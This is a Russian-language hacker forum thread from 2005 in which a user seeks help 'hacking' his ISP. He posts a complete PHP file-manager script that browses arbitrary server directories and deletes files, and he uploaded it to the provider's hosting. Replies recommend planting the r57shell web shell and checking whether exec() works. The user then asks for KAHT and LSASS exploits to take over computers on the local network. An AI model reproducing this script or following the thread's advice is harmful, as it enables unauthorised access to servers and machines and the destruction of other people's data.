Помогите со взломом прова !!!
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Помогите со взломом прова !!! - 2005-11-18 01:12:15
|
|
|
Zl0y
Сообщений: 8
Оценки: 0
Присоединился: 2005-11-18 01:04:53
|
Вобщем у меня вопрос,мой провайде предоставил мне место под страничку с поддержкой php,и я залил туда скрипт который может шарить по любому каталогу,
как мне можно открыть файл(посмотреть содержимое),если скрипт открывает к просмотру только папки ?
—————————————————————————-
Вот сам скрипт !!!
—————————————————————————-
//Autor by Zloy (qh@yandex.ru) !!!
<?php //говорим что это PHP скрипт
function cmp( $a, $b ) //обьявляем функции
{
GLOBAL $sort; //сортируем полученные функции
if( $a->inode == $b->inode )
return 0;
switch( $sort ) //объявляем , что по каким функциям будет сортироваться
{
case "size":
return ($a->size > $b->size) ? -1 : 1;
case "type":
return strcmp($a->type, $b->type);
case "view":
return strcmp($a->view, $b->view);
case "atime":
return ($a->atime > $b->atime) ? -1 : 1;
case "ctime":
return ($a->ctime > $b->ctime) ? -1 : 1;
case "mtime":
return ($a->mtime > $b->mtime) ? -1 : 1;
case "group":
return strcmp($a->group, $b->group);
case "inode":
return ($a->inode > $b->inode) ? -1 : 1;
case "owner":
return strcmp($a->owner, $b->owner);
case "perms":
return ($a->perms > $b->perms) ? -1 : 1;
case "ext":
return strcmp($a->ext, $b->ext);
case "name":
default:
return 1;
}
}
function getIcons( $ext ) //объявляем функцию сопоставления иконки с типом файла
{
switch( $ext )
{
case "dir":
$file = "dir";
break;
case "link":
$file = "link";
break;
case "zip":
case "tgz":
case "gz":
case "Z":
$file = "compressed";
break;
case "gif":
case "jpg":
$file = "imаgе2";
break;
case "dvi":
$file = "dvi";
break;
case "":
case "exe":
$file = "binary";
break;
case "sh":
case "php":
case "php3":
case "sql":
case "inc":
case "js":
$file = "Sсгiрt";
break;
case "txt":
$file = "text";
break;
case "html":
case "shtml":
case "phtml":
$file = "world1";
break;
default:
$file = "generic";
break;
}
return $IMG="<IMG SRC=''icons/".$file.".gif''>";
}
class MyFile { //объявляем какие данные будут получены
var $name;
var $path;
var $type;
var $ext;
var $stype;
var $sfile;
var $size;
var $file;
var $atime;
var $ctime;
var $mtime;
var $group;
var $inode;
var $owner;
var $perms;
function set( $filename, $path )
{
GLOBAL $cd; //объявляем функции перехода по каталогам
$this->name = $filename;
$this->path = $path;
$this->file = $this->path."/".$this->name;
$this->type = filetype( $this->file );
$this->size = filesize( $this->file );
$this->atime = fileatime( $this->file );
$this->ctime = filectime( $this->file );
$this->mtime = filemtime( $this->file );
$this->group = filegroup( $this->file );
$this->inode = fileinode( $this->file );
$this->owner = fileowner( $this->file );
$this->perms = fileperms( $this->file );
switch( $this->type )
{
case "link":
$this->sfile = readlink( $this->file );
$this->stype = filetype( $this->sfile );
$this->ext = "link";
break;
case "file":
$list = explode( ".", $this->name );
$nb = sizeof( $list );
if( $nb > 0 )
$this->stype = $list[$nb-1];
else
$this->stype = "???";
$this->ext = $this->stype;
switch( $this->stype )
{
case "gif":
case "GIF":
case "jpg":
case "JPG":
if( isset( $cd ) )
$pwd = $cd."/";
else
$pwd = "";
$this->sfile = "<IMG SRC=''".$this->file."''>";
break;
default:
$this->sfile = $this->stype;
break;
}
break;
default:
$this->stype = "";
$this->sfile = "";
$this->ext = $this->type;
break;
}
}
function formatSize()
{
return number_format( $this->size, 0, ".", " ");
}
}
function genUrl( $ref, $args, $key = "", $val = "" )
{
$valist = "";
reset( $args );
if( $key != "" )
$args[ "$key" ] = $val;
if( !is_array( $args ) )
return $ref;
while( list( $key, $val ) = each( $args ) )
{
if( $val == "" )
continue;
if( $valist == "" )
$valist .= "?";
else
$valist .= "&";
$valist .= $key."=".$val;
}
return $ref.$valist;
}
function updir( $path )
{
$last = strrchr( $path, "/" );
$n1 = strlen( $last );
$n2 = strlen( $path );
return substr( $path, 0, $n2-$n1 );
}
$ref = "xak.php";
if( isset( $cd ) )
{
$path = $cd;
//$lcd = "?cd=$cd''";
$args[ "cd" ] = $cd;
}
else
{
$path = ".";
//$lcd = "";
$args[ "cd" ] = "";
}
if( isset( $nb ) )
{
for( $i = 0; $i < $nb; $i++ )
{
$var = "id_$i";
if( isset( $$var ) )
{
$file = $path."/".$$var;
if( is_file( $file ) || is_link( $file ) )
{
if( unlink( $file ) )
echo "<BR><b>$file</b> успешно удалён\n"; //сообщение об успешном удалении файла
else
echo "<BR>Не могу удалить выставите права доступа <b>$file</b>\n"; //сообщение о невозможности удалить файл который доступен только для чтения
}
elseif( is_dir( $file ) )
{
if( rmdir( $file ) )
echo "<BR><b>$file</b> успешно удалён\n"; //сообщение об успешном удалении
else
echo "<BR>файл недоступен для удаления<b>$file</b>\n"; //сообщение о невозможности удалить файл
}
}
}
}
$step = 100;
if( !isset( $sort ) )
$sort = "name";
else
$args[ "sort" ] = $sort;
if( !isset( $from ) )
$from = 0;
else
$args[ "from" ] = $from;
if( !isset( $to ) )
$to = $from + $step;
$d = dir($path);
echo "\n";
echo "<br><a href=$ref >Вернуться в начало</a>\n"; //ссылка на возврат в домашнею директорию скрипта
$updir = updir($d->path);
if( $updir != "." )
echo "<br>Подняться на директорию вверх; <a href=$ref?cd=$updir>$updir</a>\n"; //ссылка на директорию вверх
echo "<br>Открыть директорию: <a href=$ref?cd=".$d->path."/..>..</a>\n"; //обновление текущей директории
echo "<br>Текущая директория: <b>".$d->path."</b>\n"; //показываем путь до директории и файлов, которые в ней находятся
$n = 0;
while( $entry=$d->read() )
{
$lFiles[ $n ] = new MyFile;
$lFiles[ $n ]->set( $entry, $path );
$n++;
}
$d->close(); //создаём HTML форму управления функциями
echo "<FORM NAME=''del'' METHOD=''post'' ACTION=''".genUrl( $ref, $args )."''>\n";
echo "<TABLE BORDER=1>\n";
echo "<TR>\n";
echo "<TH>D</TH>\n";
//echo "<TH><a href=''".genUrl( $ref, $args, "sort", "type" )."''>Type</a></TH>\n";
echo "<TH><a href=''".genUrl( $ref, $args, "sort", "name" )."''>Имя</a></TH>\n";
echo "<TH><a href=''".genUrl( $ref, $args, "sort", "size" )."''>Размер</a></TH>\n";
echo "<TH><a href=''".genUrl( $ref, $args, "sort", "ext" )."''>Класс</a></TH>\n";
echo "<TH><a href=''".genUrl( $ref, $args, "sort", "atime" )."''>В системе</a></TH>\n";
echo "<TH><a href=''".genUrl( $ref, $args, "sort", "ctime" )."''>Создан</a></TH>\n";
echo "<TH><a href=''".genUrl( $ref, $args, "sort", "mtime" )."''>Изменён</a></TH>\n";
echo "<TH><a href=''".genUrl( $ref, $args, "sort", "perms" )."''>Размер</a></TH>\n";
echo "<TH><a href=''".genUrl( $ref, $args, "sort", "group" )."''>Группа</a></TH>\n";
echo "<TH><a href=''".genUrl( $ref, $args, "sort", "owner" )."''>ow</a></TH>\n";
echo "<TH><a href=''".genUrl( $ref, $args, "sort", "inode" )."''>in</a></TH>\n";
echo "<TH>Показ</TH>\n";
echo "</TR>\n";
@usort( $lFiles, cmp );
for( $i = 0; $i < $n; $i++ )
{
if( ( $i < $from ) || ( $i >= $to ) )
continue;
$k = $i;
echo "<TR>\n";
echo "<TD><INPUT TYPE=''checkЬох'' NAME=''id_$k'' VALUE=''".
$lFiles[ $k ]->name
."''></TD>\n";
$IMG=getIcons( $lFiles[ $k ]->ext );
$dform = "M j y H:i";
// echo "<TD ALIGN=CENTER >".$lFiles[ $k ]->type."</TD>\n";
echo "<TD>$IMG".$lFiles[ $k ]->name."</TD>\n";
echo "<TD ALIGN=RIGHT >".$lFiles[ $k ]->formatSize()."</TD>\n";
echo "<TD>".$lFiles[ $k ]->ext ."</TD>\n";
echo "<TD>".date( $dform, $lFiles[ $k ]->atime )."</TD>\n";
echo "<TD>".date( $dform, $lFiles[ $k ]->ctime )."</TD>\n";
echo "<TD>".date( $dform, $lFiles[ $k ]->mtime )."</TD>\n";
echo "<TD>".$lFiles[ $k ]->perms."</TD>\n";
echo "<TD>".$lFiles[ $k ]->group."</TD>\n";
echo "<TD>".$lFiles[ $k ]->owner."</TD>\n";
echo "<TD>".$lFiles[ $k ]->inode."</TD>\n";
switch( $lFiles[ $k ]->type )
{
case "link":
if( $lFiles[ $k ]->stype == "dir" )
{
$tcd = $lFiles[ $k ]->path."/".$lFiles[ $k ]->name;
echo "<TD><a href=''".
genUrl( $ref, $args, "cd", $tcd )."''>".
$lFiles[ $k ]->sfile."</a></TD>\n";
}
else
echo "<TD>".$lFiles[ $k ]->sfile."</TD>\n";
break;
case "dir":
$tcd = $lFiles[ $k ]->path."/".$lFiles[ $k ]->name;
echo "<TD><a href=''".
genUrl( $ref, $args, "cd", $tcd )."''>".
$lFiles[ $k ]->name."</a></TD>\n";
break;
case "file":
echo "<TD>".$lFiles[ $k ]->sfile."</TD>\n";
break;
default:
echo "<TD>NO</TD>\n";
break;
}
echo "</TR>\n";
}
echo "</TABLE>\n";
$from = $from - $step;
if( isset( $cd ) )
{
echo "<INPUT TYPE=''hidden'' NAME=''cd'' VALUE=''$cd''>\n";
}
echo "<INPUT TYPE=''hidden'' NAME=''nb'' VALUE=''$n''>\n";
//echo "<br>from=$from;to=$to;n=$n\n";
echo "<br>\n";
if( $from >= 0 )
{
echo "<a href=''".
genUrl( $ref, $args, "from", $from )."'' >Предыдущий</a>/\n";
}
if( $to <= $n )
{
echo "<a href=''".
genUrl( $ref, $args, "from", $to )."'' >Далее</a> \n";
}
echo "<br>\n";
echo "<INPUT TYPE=''submit'' VALUE=''Del''>\n";
echo "</FORM>\n";
?> //говорим что PHP скрипт кончился
—————————————————————————–
[:pray:][:pray:] Подскажите очень надо !!!![:X3:]
|
|
|
|
|
Помогите со взломом прова !!! - 2005-11-18 01:17:08
|
|
|
dodo
Сообщений: 88
Оценки: 0
Присоединился: 2005-10-20 21:04:27
|
1)Ну и спрашивай на зломОрг..
2)Ты я смотрю ну-очень умный..гы
3)Юзай что-нибудь пороще типа ремвьюя или рстэшный шелл..
4)Забей на эту мазу, которую "взломом прова" назвать низя..
5)Ты не правильно юзаешь скрипт..
|
|
|
|
|
Помогите со взломом прова !!! - 2005-11-18 01:26:04
|
|
|
Zl0y
Сообщений: 8
Оценки: 0
Присоединился: 2005-11-18 01:04:53
|
Ну в скрипте есть функция просмотра каталогов,как зделать,чтобы он мог просматривать файлы ?[sm=001.gif][sm=15.gif]
Помогите ,кто знаком с PHP !!!
|
|
|
|
|
Помогите со взломом прова !!! - 2005-11-18 01:41:59
|
|
|
prosto
Сообщений: 125
Оценки: 0
Присоединился: 2005-11-17 01:43:53
|
Ты хоть знаешь… , что ломаешь …)))
Пото не сможеш седеть на Хак форумах !!! )))
(т.к Админ запалит и забанит)
И хвастать друзьям свои хак способности )))
СТАТЬЯ 272 неправомерный доступ к компьютерной информации
НАКАЗЫВАЕТСЯ ЛИШЕЛИЕМ СВОБОДЫ НА СРОК ДО ПЯТИ ЛЕТ
Вот что тебе нужно r57shell (эта штука умеет всё) ))) удачи
Хотя лучше запишись в кружок "Начихакеры" )))
|
|
|
|
|
Помогите со взломом прова !!! - 2005-11-18 01:48:00
|
|
|
Zl0y
Сообщений: 8
Оценки: 0
Присоединился: 2005-11-18 01:04:53
|
Короче забил на взлом,а и то вправду запалят !!!
——————————————————————-
Подскажите эксплойты типа KAHT,LSA !!!
|
|
|
|
|
Помогите со взломом прова !!! - 2005-11-18 02:17:36
|
|
|
prosto
Сообщений: 125
Оценки: 0
Присоединился: 2005-11-17 01:43:53
|
Кант и лсасс для плотформы win.
У тебя пров под WinXP sp1 ))) г-г-г….
|
|
|
|
|
Помогите со взломом прова !!! - 2005-11-18 02:21:01
|
|
|
Zl0y
Сообщений: 8
Оценки: 0
Присоединился: 2005-11-18 01:04:53
|
Нет у меня пров red hat lunix
apache 2.0.40
Помоему так !
А эксплойты нужны для взлома компов в локалке,захватить коммандную строку !!!
|
|
|
|
|
Помогите со взломом прова !!! - 2005-11-18 02:28:18
|
|
|
prosto
Сообщений: 125
Оценки: 0
Присоединился: 2005-11-17 01:43:53
|
Найди доки по r57shell
залей
и наслождайся шеллом
[sm=em121.gif]
|
|
|
|
|
Помогите со взломом прова !!! - 2005-11-18 16:18:22
|
|
|
Lex_Voodoo
Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
|
exec() работает?
Если да, перед тобой открываются гораздо большие возможности.
|
|
|
|
|
Помогите со взломом прова !!! - 2005-11-19 11:51:56
|
|
|
Zl0y
Сообщений: 8
Оценки: 0
Присоединился: 2005-11-18 01:04:53
|
Я даже на знаю работает или нет,если впихнуть в скрипт,то наверно будет !!!
Подскажите php навигатор,который умел бы читать содержимое файла !!![sm=em62.gif]
|
|
|
|
|
Помогите со взломом прова !!! - 2005-11-19 12:29:56
|
|
|
Lex_Voodoo
Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
|
Тебе ж уже сказали - поставь нормальный веб-шелл, там ВСЕ есть.
|
|
|
|
|
Помогите со взломом прова !!! - 2005-11-19 17:03:30
|
|
|
prosto
Сообщений: 125
Оценки: 0
Присоединился: 2005-11-17 01:43:53
|
Но тебя может ждать облом с php шелом…!!!
Если на машине настроен sofe mod……(Х ЗАРАЗА)….
[sm=ban.gif]
|
|
|
|
|
Помогите со взломом прова !!! - 2005-11-19 19:04:08
|
|
|
n1ght
Сообщений: 288
Оценки: 0
Присоединился: 2005-11-12 20:39:41
|
Ага, safe моде столько народу уже пообламывал )))
[sm=2.gif]
|
|
|
|
|
Помогите со взломом прова !!! - 2005-11-19 19:11:28
|
|
|
prosto
Сообщений: 125
Оценки: 0
Присоединился: 2005-11-17 01:43:53
|
Так что тебе паренёк и не стоит рыпаться….
А то дядя ADMIN просто за х… тебя забанит до 2010
|
|
|
|
|
Помогите со взломом прова !!! - 2005-11-20 10:07:41
|
|
|
Zl0y
Сообщений: 8
Оценки: 0
Присоединился: 2005-11-18 01:04:53
|
Во первых админ меня не забанит,так как он мне не чего не зделает за взлом,так как он об этом занает и не может ни чего поделать! :)
[sm=2.gif]Во вторых он мой сосед по этожу,а дальше поймёте сами !!! :)))[sm=sm203.gif]
Теперь кто может написать,как насканить себе dialup,но только не KAHT и не LSA !!! Помогите PlEaSe !! Дайте ссылку ![sm=em62.gif]
|
|
|
|
|
Помогите со взломом прова !!! - 2005-11-24 10:39:27
|
|
|
Zl0y
Сообщений: 8
Оценки: 0
Присоединился: 2005-11-18 01:04:53
|
Дайте ссылки на эксплойты для win xp sp1(2) !!!!
[sm=em62.gif][sm=sm203.gif]
|
|
|
|
|
|
